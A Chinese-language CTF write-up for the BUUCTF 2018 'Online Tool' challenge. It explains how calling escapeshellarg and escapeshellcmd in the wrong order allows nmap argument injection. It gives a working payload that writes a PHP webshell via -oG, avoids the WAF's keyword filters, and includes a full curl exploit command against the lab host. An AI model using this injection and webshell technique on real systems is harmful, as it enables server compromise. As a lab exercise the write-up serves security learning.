[BUUCTF 2018]Online Tool题目解析

打开靶场,可以看到以下内容

这道题可以用burp做也可以直接在url地址上操作,我本来想用burp做的但是这台电脑上burp有问题,所以我就演示在url地址上的操作

首先说一下他的核心漏洞与利用

漏洞点:escapeshellarg + escapeshellcmd 组合不当

  1. escapeshellarg()

    给整个字符串加单引号,同时把内部存在的单引号转义为 '\''

    例如输入:172.17.0.2' -v -d a=1

    处理后变成:'172.17.0.2'\'' -v -d a=1'

  2. escapeshellcmd()

    对整个命令字符串里的特殊字符(包括 \ 和未配对的单引号)前加 \ 进行转义。

    此时上一步的结果中,由于 escapeshellarg 额外插入的单引号,形成未配对状态,导致这些单引号被 escapeshellcmd 加上 \

    最终变成:'172.17.0.2'\\'' -v -d a=1\'

当 Shell 解析时:

  • \\ 被解释为一个普通的 \ 字符;

  • 紧接着的单引号 ' 恢复了特殊含义,从而打破了原有参数的引号包裹;

  • 后面的 -v -d a=1 便以独立参数的形式注入到 nmap 命令中。

一句话总结就是:escapeshellargescapeshellcmd 执行顺序错误,导致攻击者可以通过精心构造的单引号,把恶意参数"挤出"引号包裹,变成独立的命令选项。

解:

我一开始是想利用这个上传后门的,但会遇到下面的问题,我感觉利用后门不太好做

注意

对面的服务器的WAF过滤掉了很多敏感词,像**eval$_POST 等敏感关键字**,都是被过滤掉了的,一旦检测到,那么对方的服务器会拒绝访问并且重置连接。

所以查了下资料换个思路,我们的payload直接写一个"访问即输出 Flag"的 PHP 文件。

最终payload构成

payload:

html 复制代码
' <?=`cat /flag`;?> -oG f.php '

除此以外我们还要设置X-Forwarded-For,固定沙盒目录名,让我们能找到自己写入的Webshell

X-Forwarded-For的地址随意。这是为了避免负载均衡可能引发的麻烦

我建议在cmd里面用curl命令执行,因为curl工具不存在浏览器兼容问题,而且能精确控制请求内容。

最终命令执行

html 复制代码
curl -g -H "X-Forwarded-For: 1.1.1.1" "http://1386f0b0-558b-4ae6-b19e-744b95273737.node5.buuoj.cn:81/?host=%27%20%3C%3F%3D%60cat%20/flag%60%3B%3F%3E%20-oG%20f.php%20%27"

我们的payload一定要用url编码编好,不然浏览器解析不了

这里面的-g是(禁止 URL 通配符解析)

可以看到我们的payload执行成功,并且返回了沙盒目录名e6305cd14dbe6e1fc4041d81cb3fc9ee

这个沙盒目录名就是存放flag的地方

payload执行成功后我们就要可以访问f.php让其输出flag

最终得到flag

flag{d4ddcd42-6d16-4c5b-ab41-340461926412}

相关推荐
2501_9151063212 小时前
TraceEagle 代理抓包教程 本机和手机的 HTTPS 抓包方法
网络协议·计算机网络·网络安全·ios·adb·https·udp
云水一下16 小时前
零基础玩转 bWAPP 靶场(五):HTML 注入——存储型(博客)
web安全·html·bwapp·存储型注入
Chockmans20 小时前
春秋云境CVE-2023-51385(保姆级教学)
大数据·web安全·elasticsearch·搜索引擎·网络安全·春秋云境·cve-2023-51385
清欢渡---1 天前
HCIP-第五章vrrp
网络·网络安全·hcip
小小小小钰儿2 天前
网络安全名词术语!
安全·web安全·计算机·网络安全·黑客·编程
数据知道2 天前
BGP 劫持是怎么回事?运营商级路由安全科普
网络·安全·网络安全·智能路由器·bgp劫持
m0_738120722 天前
AI安全实战系列(四):Lab04 Multi-Agent——多智能体攻击分析
服务器·开发语言·人工智能·安全·网络安全·语言模型
NOVAnet20232 天前
SASE 架构如何为本地 DeepSeek 大模型提供全域网络安全支撑
web安全·安全架构·sd-wan·sase·零信任访问
NOVAnet20232 天前
云网 + 存储一体化灾备方案解析:南凌科技 × 爱数全景云灾备技术与行业落地价值
科技·web安全·企业数字化·企业sd-wan·混合云网络
Hiyajo pray2 天前
SDN 访问控制性能调优方法
服务器·网络·网络安全